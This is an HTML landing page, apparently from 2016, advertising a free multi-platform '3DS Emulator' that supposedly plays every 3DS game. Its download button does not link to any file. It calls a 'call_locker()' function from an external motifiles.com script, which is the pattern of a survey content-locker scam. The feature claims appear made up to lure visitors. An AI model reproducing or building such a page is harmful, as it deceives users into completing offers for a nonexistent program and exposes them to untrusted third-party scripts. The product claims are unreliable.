<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Nintendo 3ds Emulator</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <!-- Bootstrap -->
    <link href="css/bootstrap.css" rel="stylesheet">
    <link href="css/bootstrap-responsive.css" rel="stylesheet">
    <link href="css/style.css" rel="stylesheet"> 
    
    <!--Font-->
    <link href='http://fonts.googleapis.com/css?family=Source+Sans+Pro:200,300,400,600' rel='stylesheet' type='text/css'>
    
    
    
    <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      
      <!-- Fav and touch icons -->
      <link rel="shortcut icon" href="ico/favicon.ico">
      <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144-precomposed.png">
      <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114-precomposed.png">
      <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72-precomposed.png">
      <link rel="apple-touch-icon-precomposed" href="ico/apple-touch-icon-57-precomposed.png">


      

    <!-- SCRIPT 
    ============================================================-->  
    <script src="http://code.jquery.com/jquery.js"></script>
    <script src="js/bootstrap.min.js"></script>
	<script type="text/javascript" src="https://motifiles.com/script_include.php?id=521296"></script>
      
      
  </head>
  <body>
  <!--HEADER ROW-->
  <div id="header-row">
    <div class="container">
      <div class="row">
              <!--LOGO-->
              <div class="span3"><a class="brand" href="#"><img src="img/logo.png"/></a></div>
              <!-- /LOGO -->

            <!-- MAIN NAVIGATION -->  
              <div class="span9">
                <div class="navbar  pull-right">
                  <div class="navbar-inner">
                    <a data-target=".navbar-responsive-collapse" data-toggle="collapse" class="btn btn-navbar"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></a>
                    <div class="nav-collapse collapse navbar-responsive-collapse">
                    <ul class="nav">
                        <li class="active"><a href="#">Home</a></li>
                    </ul>
                  </div>

                  </div>
                </div>
              </div>
            <!-- MAIN NAVIGATION -->  
      </div>
    </div>
  </div>
  <!-- /HEADER ROW -->

  


  <div class="container">

  <!--Carousel
  ==================================================-->

  <div id="myCarousel" class="carousel slide">
    <div class="carousel-inner">

      <div class="active item">
        <div class="container">
          <div class="row">
            
              <div class="span6">

                <div class="carousel-caption">
                      <h1>3DS Emulator for PC, iOS, Android and Mac</h1>
                      <p class="lead">Download 3DS Emulator for any system and enjoy every possible 3DS Game on your device! All the games are available, including Pokemon X & Y, Mario 3D Land and so on!</p>
                      <a class="btn btn-large btn-primary" onclick="call_locker();">Download The Program!</a>
                </div>

              </div>

                <div class="span6"> <img src="img/slide/slide1.png"></div>

          </div>
        </div>
       



      </div>

    </div>
       <!-- Carousel nav -->
      <a class="carousel-control left " href="#myCarousel" data-slide="prev"><i class="icon-chevron-left"></i></a>
      <a class="carousel-control right" href="#myCarousel" data-slide="next"><i class="icon-chevron-right"></i></a>
        <!-- /.Carousel nav -->

  </div>
    <!-- /Carousel -->



<!-- Feature 
  ==============================================-->


  <div class="row feature-box">
      <div class="span12 cnt-title">
       <h1> </h1> 
        <span> </span><br/><br/><br/><br/><br/>       
      </div>

      <div class="span4">
        <img src="img/icon3.png">
        <h2>Multiple Platforms
</h2>
        <p>
            The latest version of 3DS Emulator is working on PC, iOS, Android and Mac. Choose your version and download it for free!
        </p>
      </div>

      <div class="span4">
        <img src="img/icon2.png">
        <h2>Simple To Use</h2>
        <p>Our emulator is very simple to use. Just load the 3DS Rom that you want and let it take care of the rest!
        </p>    
      </div>

      <div class="span4">
        <img src="img/icon1.png">
        <h2>No BIOS Required</h2>
        <p>
            From version 1.8 you no longer need to download 3DS Emulator BIOS separately. All you need is included in the package.
        </p>
      </div>
  </div>


<!-- /.Feature -->

  <div class="hr-divider"></div>

<!-- Row View -->


    <div class="row">
        <div class="span6"><img src="img/responsive.png"></div>

        <div class="span6">
          <img class="hidden-phone" src="img/icon4.png" alt="">
          <h1>About Features</h1>
            <p>
We always wanted to make this Emulator rich in features and easy to use so all players, even those without technical skills, can use it. Here are some of the features that you will notice when you run 3DS Emulator X.<br/><br/>
- Dual Screen – Use both screens like in real 3DS console, in 2D or with optional 3D effect.<br/>
- Virtual Memory Card – Up to 2GB of memory.<br/>
- High Quality Sound Plugins.<br/>
- Optimization tool – Use this tool that is included in the package to automatically optimize emulator according to your system requirements.<br/>
- Controller Emulation – Get full controls using your keyboard.


			</div>
    </div>

    
</div>


<!-- /.Row View -->



<!--Footer
==========================-->

<footer>
    <div class="container">
      <div class="row">
        <div class="span6">Copyright &copy 2016 3DSEmuX | All Rights Reserved  <br>
        </div>
        <div class="span6">

        </div>
      </div>
    </div>
</footer>

<!--/.Footer-->

  </body>
</html>